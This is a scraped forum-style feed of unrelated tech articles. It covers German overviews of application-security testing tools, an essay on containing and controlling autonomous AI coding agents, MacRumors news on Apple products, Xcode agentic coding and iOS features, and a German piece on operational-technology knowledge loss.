Die Acunetix DAST-Plattform nutzt DAST und IAST (Interactive Application Security Testing), um nach über 7.000 Schwachstellen in fertigem Code, Website-Designs oder Anwendungen zu suchen. Bei IAST wird der Scan- und Testcode in ein kompiliertes Programm eingebettet, ähnlich wie bei Debug-Symbolen. Somit kann Acunetix seine Scans starten, während ein Programm aktiv ausgeführt wird. auf diese Weise werden potenziell mehr Schwachstellen aufgedeckt als bei der Untersuchung einer Anwendung im Ruhezustand. IAST sollte auch die Zahl der Fehlalarme (im Vergleich zu SAST) verringern.
Der Code für die Plattform ist aus Speed-Gründen in C++ geschrieben. Dabei exportiert die Plattform bis zu 90 Prozent ihrer Ergebnisse bereits, während der Scan noch nicht einmal zur Hälfte abgeschlossen ist. Die Benutzer können die Acunetix-Plattform so konfigurieren, dass sie einmalig ausgeführt wird oder Zeitpläne für wiederholte Tests im Laufe der Zeit einrichten. Und weil die Plattform so schlank ist, kann sie sogar mehrere Umgebungen gleichzeitig scannen, ohne dabei an Geschwindigkeit einzubüßen.
2. Opentext Fortify WebInspect
Die ehemalige Fortify-WebInspect-Plattform von Micro Focus firmiert nach der Übernahme des Unternehmens durch Opentext unter dem Namen Fortify WebInspect. Sie ist als On-Premises-Installation, als Service oder als Kombination aus beidem innerhalb einer hybriden Umgebung verfügbar. Obwohl es als isoliertes DAST-Tool arbeitet, lässt es sich in CI/CD-Pipelines integrieren und kann auch von Entwicklern genutzt werden, die normalerweise nur SAST-Tools verwenden.
Das Tool kann auch nur nach besonders kritischen Schwachstellen suchen und die Entwickler so vor schwerwiegenden Fehlern warnen, damit diese schon lange vor Bereitstellung behoben werden. Darüber hinaus ist dieses DAST-Tool auch in der Lage zu prüfen, ob der Code im Einklang mit staatlichen Regularien steht (NIST 800-53, PCI DSS, OWASP, HIPAA, etc.). Wird eine Schwachstelle entdeckt, visualisiert die Plattform das Problem mit einer grafischen Oberfläche und unterbreitet iterative Lösungsvorschläge.
3. Black Duck (ehemals Synopsis)
Die DAST-Plattform von Black Duck ist auch als Managed Service verfügbar. Dadurch entfällt nicht nur interne Wartung und Management – das Unternehmen steht bei Bedarf auch mit Rat und Tat zur Seite, beispielsweise wenn Scan ein Problem aufwirft, mit dem das Entwicklungsteam überfordert ist.
Das Tool deckt nicht nur alle gängigen Schwachstellen auf, die viele Programme plagen (etwa SQL-Injection oder Cross-Site-Scripting), sondern verfügt auch über einen manuellen Scan-Modus, mit dem Sie auch komplexeren Problemen gezielt auf dioe Spur kommen. Auch Sicherheitslücken in Zusammenhang mit Authentifizierungs-, Zugriffskontroll- und Session-Management-Fehlern, die bei herkömmlichen Scans nicht auftauchen, findet das Tool.
4. Tenable.io Web App Scanning
Tenable ist unter den Sicherheitsanbietern eine Art Urgestein und ist in erster Linie für seine robuste, Cloud-basierte Vulnerability-Management-Plattform bekannt. Web App Scanning ist ein Teil dieser Plattform und fungiert als leistungsfähiges DAST-Tool.
Die Tenable-App arbeitet nur mit Webanwendungen, führt aber einen tiefgehenden Scan durch, der sowohl HTML5 als auch Standard-HTML und AJAX abdeckt. Die App verfügt über eine simple Benutzeroberfläche, die auch für Teams zugänglich ist, die ohne Application-Security-Spezialisten auskommen müssen. Automatisierungen sind einfach einzurichten und die Benutzer können genau konfigurieren, welche Abschnitte des Programmcodes gescannt werden sollen. Davon abgesehen lässt sich der Web App Scanner auch als Standalone-Lösung verwenden – oder in eine andere Cybersecurity-Lösung von Tenable integrieren.
Static Application Security Testing Tools: Top 5
1. Checkmarx SAST
Das SAST-Programm von Checkmarx kombiniert fortschrittliche Funktionen mit einer der besten webbasierten Benutzeroberflächen für SAST-Tools. Die Benutzeroberfläche ermöglicht es auch Security-Unkundigen, sich zurechtzufinden. Checkmarx identifiziert nicht nur Schwachstellen, sondern erklärt auch, warum eine entdeckte Schwachstelle besonders riskant ist. Zudem erhalten Entwickler Tipps, wie die gefundenen Probleme am einfachsten und effektivsten beseitigt werden können.
Standardmäßig unterstützt das Checkmarx-Tool über 25 Programmiersprachen. Zudem lässt sich die Anwendung so konfigurieren, dass sie automatisch als Teil einer CI/CD-Pipeline ausgeführt wird. Natürlich dürfen Sie auch benutzerdefinierte Abfragen einrichten und nach Bedarf ausführen und das Tool in alle gängigen IDE- oder Quellcode-Management-Plattformen integrieren.
2. Opentext Fortify Static Code Analyzer
Sowohl SAST- als auch DAST-Elemente kombiniert Fortify Static Code Analyzer von Opentext. Als SAST-Plattform verwendet die Lösung eine übersichtliche, visuelle Schnittstelle, um Entwicklern die spezifischen Schwachstellen im Code (und Statistiken über die Art der regelmäßig aufgedeckten Schwachstellen) aufzuzeigen, die in 810 verschiedene Schwachstellenkategorien unterteilt sind. Anschließend werden die Entwickler zu einer Schulungsoberfläche weitergeleitet, die laut Anbieter interessante und unterhaltsame Lektionen über Security und sicheren Code bereithalten soll.
Die Plattform unterstützt 27 Programmiersprachen und Frameworks und kann On-Premises oder als Service eingesetzt werden. Zudem lässt sie sich in die meisten gängigen IDEs wie Eclipse und Visual Studio integrieren.
3. Perforce Klocwork SAST
Das SAST-Tool Klocwork setzt den Fokus auf Geschwindigkeit – selbst in den größten Umgebungen. Es funktioniert mit Anwendungen, die in C, C++, Java, JavaScript und Python kodiert sind – sogar innerhalb von Docker-Containern – und kann in jede größere IDE wie Visual Studio Code, IntelliJ und viele andere integriert werden. Laut Anbieter wurde Klocwork entwickelt, um ein SAST-Tool für komplexe Umgebungen zu realisieren.
Mit Klocwork können Anwender riesige Codebasen scannen, die Millionen von Zeilen beinhalten. Um die Scan-Dauer zu verkürzen, werden beispielsweise nur die geänderten Codebereiche gescannt und nicht jedes Mal das gesamte Programm. Darüber hinaus hilft das SAST-Tool dabei, Entwickler in Sachen Security zu schulen: Es ist vollständig in die Schulungsplattform Secure Code Warrior integriert, die sich auf Sicherheits- und Awareness-Schulungen konzentriert.
4. Spectral SpectralOps-Plattform
Check Point hat vor kurzem Spectral übernommen, aber das neue Unternehmen unterstützt weiterhin aktiv die SpectralOps-Plattform, wahrscheinlich auch wegen ihrer einzigartigen SAST-Funktionen. SpectralOps findet sensible Informationen wie API-Schlüssel, Anmeldeinformationen und Token, die Entwickler bei der Entwicklung von Programmen oft fest einkodieren. Die Idee dahinter: Fehlkonfigurationen aufzudecken, die den Zugriff auf geheime Informationen ermöglichen könnten, während sich ein Programm noch in der Entwicklung befindet.
SpectralOps scannt kontinuierlich jeden Schritt im Lebenszyklus der Softwareentwicklung und nutzt Künstliche Intelligenz, um über 2.000 Erkennungs-Engines im Auge zu behalten. Um Fehlalarme in Zaum zu halten, finden auch nachgelagerte Tests statt. Im Anschluss kann das Tool seine Ergebnisse an Slack melden, ein Jira-Ticket ausstellen oder Entwickler über fast jede beliebige Kommunikationsplattform alarmieren.
5. Veracode Static Analysis SAST
Die SAST-Plattform von Veracode ist ein Cloud Service – die komplexe Wartung einer SAST-Anwendung in Ihrer Umgebung entfällt damit. Sicherheitsanbieter Veracode arbeitet nach dem Prinzip des Just-in-Time-Learnings. Das bedeutet, anfälliger Code kann bereits bei der Programmierarbeit erkannt werden. Ist der Code korrigiert, erstellt die Veracode-Plattform ein Reporting, so dass Unternehmen sicherheitsbewusste Entwickler fördern und ermutigen können.
Neben der Integration in eine IDE liegt der Schwerpunkt von Veracode auf Geschwindigkeit: Jeder Build eines Programms oder einer Anwendung kann automatisch gescannt werden, wobei die durchschnittliche Scan-Zeit bei lediglich 90 Sekunden liegt. Dabei wird durchgängig jede Aktion erfasst, was wiederum Audits erleichtert.
Sie wollen weitere interessante Beiträge rund um das Thema IT-Sicherheit lesen? Unser kostenloser Newsletter liefert Ihnen alles, was Sicherheitsentscheider und -experten wissen sollten, direkt in Ihre Inbox.
View the full article
- 0 comments
- 80 views
-
The Unattended Laptop Problem
No developer would leave their laptop unattended and unlocked. The risk is obvious. A developer laptop has root-level access to production systems, repositories, databases, credentials, and APIs. If someone sat down and started using it, they could review pull requests, modify files, commit code, and access anything the developer can access.
Yet this is how many teams are deploying agents today. Autonomous systems are given credentials, tools, and live access to sensitive environments with minimal structure. Work executes in parallel and continuously, at a pace no human could follow. Code is generated faster than developers can realistically review, and they cannot monitor everything operating on their behalf.
Once execution is parallel and continuous, the potential for mistakes or cascading failures scales quickly. Teams will continue to adopt agents because the gains are real. What remains unresolved is how to make this model safe enough to operate without requiring manual approval for every action. Manual approval slows execution back down to human speed and eliminates the value of agents entirely. And consent fatigue is real.
Why AI Agents Break Existing Governance
Traditional security controls were designed around a human operator. A person sits at the keyboard, initiates actions deliberately, and operates within organizational and social constraints. Reviews worked because there was time between intent and execution. Perimeter security protected the network boundary, while automated systems operated within narrow execution limits.
But traditional security assumes something deeper: that a human is operating the machine. Firewalls trust the laptop because an employee is using it. VPNs trust the connection because an engineer authenticated. Secrets managers grant access because a person requested it. The model depends on someone who can be held accountable and who operates at human speed.
Agents break this assumption. They act directly, reading repositories, calling APIs, modifying files, using credentials. They have root-level privileges and execute actions at machine speed.
Legacy controls were never intended for this. The default response has been more visibility and approvals, adding alerts, prompts, and confirmations for every action. This does not scale and generates “consent fatigue”, annoying developers and undermining the very security it seeks to enforce. When agents execute hundreds of actions in parallel, humans cannot review them meaningfully. Warnings become noise.
AI Governance and the Execution Layer: The Three Cs Framework
Each major shift in computing has moved security closer to execution. Agents follow the same trajectory. If agents execute, security must operate at the agentic execution layer.
That shift maps governance to three structural requirements: the 3Cs.
Contain: Bound the Blast Radius
Every execution model relies on isolation. Processes required memory protection. Virtual machines required hypervisors. Containers required namespaces. Agents require an equivalent boundary. Containment limits failure so mistakes made by an agent don’t have permanent consequences for your data, workflows, and business. Unlocking full agent autonomy requires the confidence that experimentation won’t be reckless. . Without it, autonomous execution fails.
Curate: Define the Agent’s Environment
What an agent can do is determined by what exists in its environment. The tools it can invoke, the code it can see, the credentials it can use, the context it operates within. All of this shapes execution before the agent acts.
Curation isn’t approval. It is construction. You are not reviewing what the agent wants to do. You are defining the world it operates in. Agents do not reason about your entire system. They act within the environment they are given. If that environment is deliberate, execution becomes predictable. If it is not, you have autonomy without structure, which is just risk.
Control: Enforce Boundaries in Real Time
Governance that exists only on paper has no effect on autonomous systems. Rules must apply as actions occur. File access, network calls, tool invocation, and credential use require runtime enforcement. This is where alert-based security breaks down. Logging and warnings explain what happened or ask permission after execution is already underway.
Control determines what can happen, when, where, and who has the privilege to make it happen. Properly executed control does not remove autonomy. It defines its limits and removes the need for humans to approve every action under pressure. If this sounds like a policy engine, you aren’t wrong. But this must be dynamic and adaptable, able to keep pace with an agentic workforce.
Putting the 3Cs Into Practice
The three Cs reinforce one another. Containment limits the cost of failure. Curation narrows what agents can attempt and makes them more useful to developers by applying semantic knowledge to craft tools and context to suit the specific environment and task. Control at the runtime layer replaces reactive approval with structural enforcement.
In practice, this work falls to platform teams. It means standardized execution environments with isolation by default, curated tool and credential surfaces aligned to specific use cases, and policy enforcement that operates before actions complete rather than notifying humans afterward. Teams that build with these principles can use agents effectively without burning out developers or drowning them in alerts. Teams that do not will discover that human attention is not a scalable control plane.
View the full article
- 0 comments
- 37 views
-
The third-party Apple retailer said that MacBook Pro stock is very low currently because there is an imminent new product introduction. Apple typically coordinates supply with retail stores ahead of a new model launch to avoid leaving resellers with too many outdated machines.
Over the weekend, Bloomberg said that the new MacBook Pros are going to launch alongside macOS Tahoe 26.3 during the February/March timeframe, and we are getting closer to the software's release date. Today's Xcode 26.3 release candidate launch also suggests that a debut isn't far off.
It's atypical for Apple to introduce an Xcode release candidate without also providing iOS and macOS release candidates, and we haven't seen the iOS 26.3 or macOS 26.3 RCs yet. Holding back a macOS release candidate is sometimes an indication that the RC contains information that Apple doesn't want to leak. If the M5 Pro and M5 Max MacBook Pro models are going to come out alongside macOS Tahoe 26.3, it's possible that the macOS Tahoe 26.3 RC includes new model identifiers that would give away the upcoming launch.
Apple has most commonly held macOS release candidates for a few days to a week. Prior to when new M3 Macs came out in October 2023, for example, Apple provided the iOS 17.1 and accompanying Xcode release candidate on October 17, but held the macOS 14.1 release candidate. New Macs were introduced on October 23, and then the macOS 14.1 RC came out on October 24. Apple followed the same pattern ahead of the first M1 Macs in November 2020, and the M2 Mac mini in October 2022. In each case, Apple held the macOS RC while launching the iOS and Xcode RCs.
What's different in this situation is that we haven't seen the iOS 26.3 RC either, so the hold time is less clear. Apple could debut new MacBook Pro models as soon as tomorrow, then release both RCs. There's also a possibility we have to wait a week or two before new MacBook Pro models come out, especially if the RCs aren't quite ready to go and another beta update is planned.
It's not entirely clear why Apple released the Xcode 26.3 RC now instead of holding it, but it does include agentic coding tools that Apple worked with Anthropic and OpenAI to implement, so Apple may have committed to a specific schedule for the functionality.
All signs suggest that we're going to get the M5 Pro and M5 Max MacBook Pro models soon. Apple already released the standard 14-inch M5 MacBook Pro, but higher-end 14-inch and 16-inch models have yet to be refreshed.
The reseller that spoke to MacRumors also said that HomePod mini supplies are drying up with many models sold out, but there is no official word on whether that's because of supply chain issues or because of an imminent update. HomePod mini stock has been dwindling since October 2025, so stock continuing to be low doesn't give us new information on the HomePod mini 2, unfortunately.Related Roundup: MacBook ProBuyer's Guide: MacBook Pro (Caution)Related Forum: MacBook Pro
This article, "M5 Pro and M5 Max MacBook Pro Launch Imminent as Reseller Stock Dwindles" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 29 views
-
In addition to answering questions about Apple devices and services and providing device-specific help, Apple says the Support Assistant is able to help run diagnostics to show details about a device's health and performance.
The Apple Support app now has a more informative interface for the Support Assistant, and the tab for accessing the feature has an updated "Ask" label with a new icon instead of a "Chat" label. Apple is no longer calling the Support Assistant an "Early Preview," suggesting it is now available in a more official capacity.
Despite the update, the Support Assistant remains limited, and it is not yet available to all users. It's possible that Apple has expanded the feature to a larger number of testers, but not everyone will see it yet.
Apple began testing the Support Assistant last August. The tool uses AI to answer questions related to Apple support, and it is able to walk users through step-by-step solutions for common problems.
If the Support Assistant is unable to solve a problem, users are able to escalate a request to Apple's support staff for further help.Tag: Apple Support
This article, "Apple Continues Improving Apple Support App's AI Assistant" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 38 views
-
Agentic coding will allow Xcode to complete more complex app development tasks autonomously. Claude, ChatGPT, and other AI models have been available for use in Xcode since Apple added intelligence features in Xcode 26, but until now, AI was limited and was not able to take action on its own. That will change with the option to use an AI coding assistant.
AI models can access more of Xcode's features to work toward a project goal, and Apple worked directly with Anthropic and OpenAI to configure their agents for use in Xcode. Agents can create new files, examine the structure of a project in Xcode, build a project directly and run tests, take image snapshots to double-check work, and access full Apple developer documentation that has been designed for AI agents.
Adding an agent to Xcode can be done with a single click in the Xcode settings, with agents able to be updated automatically as AI companies release updates. Developers will need to set up an Anthropic or OpenAI account to use those coding tools in Xcode, paying fees based on API usage.
Apple says that it aimed to ensure that Claude Agent and Codex run efficiently, with reduced token usage. It is simple to swap between agents in the same project, giving developers the flexibility to choose the agent best suited for a particular task.
While Apple worked with OpenAI and Anthropic for Xcode integration, the Xcode 26.3 features can be used with any agent or tool that uses the open standard Model Context Protocol. Apple is releasing documentation so that developers can configure and connect MCP agents to Xcode.
Using natural language commands, developers are able to instruct AI agents to complete a project, such as adding a new feature to an app. Xcode then works with the agent to break down the instructions into small tasks, and the agent is able to work on its own from there. Here's how the process works:
A developer asks an integrated agent to add a new feature to an app.
The agent looks at the current project to see how it's organized.
The agent checks all relevant documentation, looking at code snippets, code samples, and the latest APIs.
The agent begins working on the project, adding code as it goes.
The agent builds the project, then uses Xcode to verify its work.
If there are errors or warnings, the agent continues to work until all issues are addressed. It is able to access build logs and revise until a project is perfect.
The agent wraps up by providing a summary of everything that happened so developers have a clear view of the implementation.
In the sidebar of a project, developers can follow along with what the agent is doing using the transcript, and can click to see where code is added to keep track of what the agent is doing. At any point, developers can go back to before an agent or model made a modification, so there are options to undo unwanted results or try out multiple options for introducing a new feature.
Apple says that agentic coding will allow developers to simplify workflows, make changes quicker, and bring new ideas to life. Apple also sees it as a learning tool that provides developers with the opportunity to learn new ways to build something or to implement an API in an app.
The release candidate of Xcode 26.3 is available for developers as of today, and a launch will likely follow in the next week or so.Tag: Xcode
This article, "Xcode 26.3 Lets AI Agents From Anthropic and OpenAI Build Apps Autonomously" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 32 views
-
In an email this week, Apple gave customers a final reminder to upgrade their Home app by February 10, 2026. Apple says users who do not upgrade may experience issues with accessories and automations, or lose access to their smart home in the app entirely. In addition, users who do not upgrade will miss out on newer features like robot vacuum cleaner support, and they will not receive important security fixes and performance improvements.
Apple explains how to upgrade the Home app on the iPhone, iPad, or Mac:
Open the Home app
Tap or click on the three dots in the upper-right and navigate to Home Settings
Tap or click on Software Update
Tap or click Update Now, then follow the prompts. All of the homes that you own are updated at the same time.
If you see "This home and all accessories are up to date," then you are on the current version of the app and no further action is required.
Notably, the new version of Apple Home requires a minimum of iOS 16.2, iPadOS 16.2, macOS 13.1, tvOS 16.2, and watchOS 9.2.Tags: Apple Home, HomeKit
This article, "Apple Gives Final Warning to Home App Users" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 31 views
-
As in previous years, Replay 2026 ranks your most-played songs on Apple Music from 1 to 100, updating weekly as your listening habits evolve throughout 2026. Apple typically activates Replay in early February, once January listening data has finished processing, allowing subscribers to track their music activity well ahead of the traditional year-end recap.
Unlike a static summary released in December, Replay primarilony functions as an evolving playlist. From its first appearance in February, rankings refresh every weekend, gradually building a complete picture of your top songs across the year. By the time December arrives, Replay 2026 becomes a finalized list of your 100 most-streamed tracks.
Replay 2026 can be accessed directly in the Apple Music app by opening the Home tab, scrolling to the "Replay: Your Top Music" section. It is also available through Apple Music for the web, where users can sign in with their Apple ID. Once the Replay 2026 playlist is added to your library, it updates automatically every week.
New generated playlists can sometimes take several hours to appear. If Replay 2026 does not appear after a short while, the most common causes are disabled listening history or insufficient listening activity. Apple requires listening history to be enabled and enough streamed music to generate rankings. Listening history can be checked in Settings under Music, where "Use Listening History" must be turned on. Light or infrequent listening may delay Replay activation, but the playlist should appear automatically once these conditions are met.
Apple Music Replay has been available annually since 2019, originally launching as a web-only experience with an accompanying playlist. Apple gradually expanded Replay's scope in the following years. From 2022 onward, the feature placed greater emphasis on detailed statistics and visual summaries, including structured breakdowns of listening activity across the year. With more recent updates to Apple Music, Replay's detailed views are now available directly inside the Apple Music app, including monthly breakdowns and expanded listening insights alongside the Replay playlist itself.Tag: Apple Music
This article, "Apple Music Replay 2026 Now Available" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 32 views
-
- 0 comments
- 38 views
-
The Weibo user claims that since the iPhone 17 lineup proved to be successful with high sales, the iPhone 18 models likely won't have major changes to their appearance. Rather than promoting design changes, Apple is apparently likely to heavily emphasize advancements made with the A20 and A20 Pro chip, which will likely be the first 2nm Apple silicon chips. This upgrade is anticipated to be a key point of discussion around the new devices later this year.
The iPhone 17 Pro models saw a major redesign, following two years of the same design across the iPhone 15 Pro and iPhone 16 Pro. The iPhone 12 Pro, 13 Pro, and 14 Pro also largely shared the same design, as did the iPhone X, iPhone XS, and iPhone 11 Pro. Successive generation-over-generation flagship iPhone redesigns would be unprecedented, making it highly likely that the iPhone 18 Pro will look very similar to the device currently on sale.
The iPhone 18 Pro and iPhone 18 Pro Max are expected to launch later this year, featuring a smaller Dynamic Island, the C2 modem, a simplified Camera Control, a 24-megapixel front-facing camera, and an upgraded main camera with a variable aperture. The iPhone 18 is expected to follow in early 2027, touting many of the same upgrades.
Related Roundup: iPhone 18Tag: Fixed Focus DigitalRelated Forum: iPhone
This article, "No Major Design Changes Coming to iPhone 18 Models, Leaker Claims" first appeared on MacRumors.com
View the full article
- 0 comments
- 29 views
-
Below, we have recapped known or rumored iOS 26.3 and iOS 26.4 features so far.
iOS 26.3
iPhone to Android Transfer Tool
iOS 26.3 makes it easier for iPhone users to switch to an Android device. A new tool allows you to place your iPhone next to an Android device to wirelessly transfer photos, messages, notes, apps, and more. You can also transfer your phone number.
In the iOS 26.3 beta, the new tool can be found in the Settings app, under General → Transfer or Reset iPhone → Transfer to Android. It is available worldwide.
Notification Forwarding in EU
In the EU, iOS 26.3 introduces both a Notification Forwarding feature and AirPods-like proximity pairing for third-party accessories like earbuds and smartwatches.
Apple was required to make these changes to comply with the EU's Digital Markets Act.
End-to-End Encrypted RCS Preparations
As of the second iOS 26.3 beta, Apple appears to be laying the groundwork for carriers to be able to support end-to-end encryption for RCS messages.
More
Starting with iOS 26.3, there is a dedicated section for Weather wallpapers, with three preset options available to choose from. To access them, tap and hold on the Lock Screen and tap on the plus sign in the bottom-right corner of the screen.
iOS 26.3 introduces a new "Limit Precise Location" setting that reduces the location data available to mobile networks to increase user privacy.
iOS 26.1 introduced a Background Security Improvement feature that is designed to provide security updates for Safari, WebKit, and some other system items between iOS software updates. Apple has been testing the feature with updates such as "iOS 26.3 (a)" and "iOS 26.3 (b)," but they do not actually contain any security fixes.
iOS 26.4
Personalized Siri
Last month, Apple and Google announced that Google Gemini will help power a more personalized version of Siri coming this year.
The more personalized version of Siri is expected to be introduced with iOS 26.4, following a lengthy delay. The new capabilities will include better understanding of a user's personal context, on-screen awareness, and deeper per-app controls, but some of this functionality might not be available until iOS 27 later this year.
For example, all the way back at WWDC 2024, Apple showed an iPhone user asking Siri about their mother's flight and lunch reservation plans based on info retrieved from the Mail and Messages apps.
Looking ahead, Apple is reportedly planning to launch a full-out Siri chatbot on iOS 27, allowing users to have ChatGPT-like conversations with Siri.
New Emoji
Last year, the Unicode Consortium previewed some of the new emoji that are expected to be added to the iPhone with iOS 26.4.
Here are nine of the new emoji:Trombone
Treasure Chest
Distorted Face
Hairy Creature (aka Bigfoot or Sasquatch)
Fight Cloud
Apple Core
Orca
Ballet Dancers
LandslideApple most recently added new emoji to the iPhone with iOS 18.4, an update that came out in March last year. iOS 17.4, iOS 16.4, and iOS 15.4 also introduced new emoji over the years, so the timing has become predictable by this point.
More
Macworld's Filipe Espósito leaked some other potential iOS 26.4 features:If you have credit card information stored in Apple's Passwords app, you will be able to AutoFill those details in third-party apps.
You will be able to create folders in the Freeform app.
Apple is apparently working on a new sports tier for the Apple TV app, but the report did not offer any further details about this.
There are signs of "a new validation system that will check the integrity of the device before logging into Apple ID and iCloud."
A new "Precise Outdoor Location" feature for AirPods in the Find My app.iOS 26.4 should have many other new features, so stay tuned.Related Roundups: iOS 26, iPadOS 26Related Forum: iOS 26
This article, "iOS 26.3 and iOS 26.4 Will Add These New Features to Your iPhone" first appeared on MacRumors.com
View the full article
- 0 comments
- 25 views
-
Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.
Additionally, there are a few solid discounts on Apple products like AirPods, Apple Watch, and iPad. In this article you'll find deals from third-party retailers collected first, including special Valentine's Day themed sales from AT&T, ZAGG, Casely, and more.
Valentine's Accessory Sales
Best Buy - Save up to 50% on select TVs
Nomad - Save 49% in Nomad's overstock sale
OtterBox - Save 30% on cases, 50% on charging accessories, and more
Anker - Save up to 40% on essential accessories
Sonos - Save up to 20% off soundbars, speakers, and subwoofers
AT&T - iPhone 17 Pro at no cost with eligible trade-in
Samsung - Save on Samsung monitors and TVs
ZAGG - Save up to 75% during clearance event
Casely - Save 10% sitewide with code LOVE10
Casetify - Buy 2 get 20% off with code LOVE2026
AirPods
Amazon this week has major discounts on a few AirPods models, including some of the best prices of the year so far on AirPods 4. You can get the base AirPods 4 for $99.99 on Amazon, down from $129.00.
$29 OFFAirPods 4 for $99.99
Amazon also has the AirPods 4 with Active Noise Cancellation for $119.99, down from $179.00. We did track both of these these at a lower prices during the 2025 holiday season, but these deals never returned and today's is the best we've seen so far in 2026.
$59 OFFAirPods 4 (ANC) for $119.99
AirTag
Amazon has the first generation AirTag 4-Pack for $69.98 this week, down from $99.00. This is a second-best price on the accessory, and just a few dollars away from the record low price.
$29 OFFAirTag 4-Pack for $69.98
Apple Watch
Amazon this week has the 42mm GPS Apple Watch Series 11 on sale for $299.00, down from $399.00, and the 46mm GPS model for $329.00, down from $429.00. This is only the second time so far in 2026 that we've tracked $100 markdowns on the Series 11, and nearly every aluminum model is on sale right now.
$100 OFFApple Watch Series 11 (42mm GPS) for $299.00
$100 OFFApple Watch Series 11 (46mm GPS) for $329.00
If you're shopping for cellular models, you can find record low prices on multiple models this week on Amazon. The 42mm cellular Apple Watch Series 11 has hit $399.00, down from $499.00, and the 46mm cellular model has hit $429.00, down from $529.00.
$100 OFFApple Watch Series 11 (42mm Cell) for $399.00
$100 OFFApple Watch Series 11 (46mm Cell) for $429.00
iPad
There are numerous iPads on sale in early February, and we're starting with a $49 discount on the 11-inch iPad at Amazon. You can get the 128GB Wi-Fi iPad for $299.99, down from $349.00, which is the best price we've tracked in 2026 so far and an overall second-best price.
$49 OFF128GB Wi-Fi iPad for $299.99
$49 OFF256GB Wi-Fi iPad for $399.99
$49 OFF512GB Wi-Fi iPad for $599.99
Amazon this week is also providing record low prices on multiple models of the iPad mini 7, starting at $399.99 for the 128GB Wi-Fi tablet, down from $499.00. Best Buy is also matching many of these iPad deals, and in some cases it has better delivery estimates.
$99 OFF128GB Wi-Fi iPad mini 7 for $399.99
$99 OFF256GB Wi-Fi iPad mini 7 for $499.99
$99 OFF512GB Wi-Fi iPad mini 7 for $699.99
Amazon recently introduced discounts across the M5 iPad Pro lineup, including both 11-inch and 13-inch models. Prices start at $899.99 for the 256GB Wi-Fi 11-inch iPad Pro, down from $999.00.
$99 OFF11-inch M5 iPad Pro (256GB Wi-Fi) for $899.99
$149 OFF13-inch M5 iPad Pro (512GB Wi-Fi) for $1,349.99
If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.
Deals Newsletter
Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!
Related Roundup: Apple Deals
This article, "Valentine's Day Deals: Get Low Prices on AirPods, iPad, Apple Watch, and More" first appeared on MacRumors.com
View the full article
- 0 comments
- 28 views
-
"The humans of Apple TV," says Apple, succinctly.
In a world where AI is increasingly prevalent, it would appear that Apple wants to remind everyone that its original content is still deeply human.Tags: Apple Ads, Apple TV Shows
This article, "'Humans of Apple TV'" first appeared on MacRumors.com
View the full article
- 0 comments
- 34 views
-
Zwar stellen Cyberkriminelle und staatlich unterstützte Angreifer gerade für den Industriesektor eine enorme und steigende Gefahr dar. Dennoch besteht die größte Bedrohung derzeit im mangelnden Wissenstransfer, was OT-Sicherheit und -Organisation (Operational Technology) angeht. Das Hauptproblem sind vertrauenswürdige Mitarbeiter, die in Rente gehen.
Diese Personen sind in der Regel engagiert, sachkundig und unersetzlich. Sie wissen, auf welchem unbeschrifteten Server das System zur Erfassung historischer Daten läuft, das die Aufsichtsbehörden verlangen. Sie erinnern sich daran, warum ein bestimmtes VLAN mit scheinbar zufälligen IP-Adressen konfiguriert wurde. Sie wissen, welche Netzwerkrouten nur unter Produktionsstillstand geändert werden können. Ihr institutionelles Wissen umfasst somit Tausende von IP-Adressen, undokumentierte Netzwerkrouten und versteckte VLANs, die in der offiziellen Dokumentation fehlen.
Ihre Nachfolger hingegen bringen Erwartungen an moderne, gut dokumentierte Netzwerkarchitekturen mit. Stattdessen erben sie ein komplexes Geflecht aus Altsystemen, proprietären Protokollen und undokumentierten Konfigurationen, die das Ergebnis jahrzehntelanger schrittweiser Änderungen und Notfallkorrekturen sind. Die Diskrepanz zwischen Erwartungen und Realität führt zu einer Wissenslücke, die sowohl die Betriebskontinuität als auch die Cybersicherheit gefährdet.
Hierbei handelt es sich jedoch um eine Art „Single Point of Failure“, den die meisten Unternehmen erst erkennen, wenn es bereits zu spät ist.
Der Weggang erfahrener OT-Fachkräfte birgt drei kritische Risiken, die weit über einfache Personalprobleme hinausgehen und bei herkömmlichen Risikobewertungen meist unterschätzt werden:
1. Systemausfälle während der Modernisierung
Das unmittelbare und schwerwiegendste Risiko besteht in unbeabsichtigten Folgen während System-Upgrades oder Modernisierungsmaßnahmen. Ältere OT-Netzwerke enthalten das, was Branchenexperten als „archäologische Schichten“ bezeichnen: Jahrzehntelange inkrementelle Modifikationen, Notfallkorrekturen und undokumentierte Konfigurationen, die versteckte Abhängigkeiten schaffen.
Die größten Risiken:
Nicht dokumentierte Altsysteme: Die meisten Produktionsstätten verfügen über mindestens ein Windows-NT- oder Windows-XP-System, auf dem unverzichtbare historische Daten gespeichert sind oder zentrale Prozesse gesteuert werden. Diese Systeme sind oft nicht hinreichend dokumentiert. Ihre Entfernung im Zuge von Modernisierungsmaßnahmen kann zum Verlust der Produktionsdaten von Jahrzehnten führen, die für die Einhaltung gesetzlicher Vorgaben erforderlich sind. Versteckte Netzwerkabhängigkeiten: IP-Routing-Tabellen, VLAN-Konfigurationen und Firewall-Regeln enthalten oft scheinbar willkürliche Einstellungen, die jedoch tatsächlich Netzwerkkonflikte verhindern oder die Kommunikation kritischer Systeme aufrechterhalten. Eine Änderung dieser Konfigurationen ohne institutionelles Wissen kann zu einem Dominoeffekt über mehrere Produktionslinien hinweg führen. Anforderungen an proprietäre Protokolle: Viele ältere Industriesysteme kommunizieren über proprietäre oder modifizierte Standardprotokolle. Die spezifischen Konfigurationsparameter, die diese Kommunikation ermöglichen, sind selten dokumentiert und existieren nur im institutionellen Wissen ausscheidender Mitarbeiter. Lesetipp: CISOs müssen OT-Risiken stärker adressieren
2. Verlängerte Time-to-Value für neue Geräte und Prozesse
Der Verlust von spezifischem Know-how verlängert die Implementierungszeiten für neue Geräte, Prozessverbesserungen und Systemintegrationen erheblich. Dieser Effekt verstärkt sich mit der Zeit und führt zu Wettbewerbsnachteilen und verpassten Optimierungsmöglichkeiten.
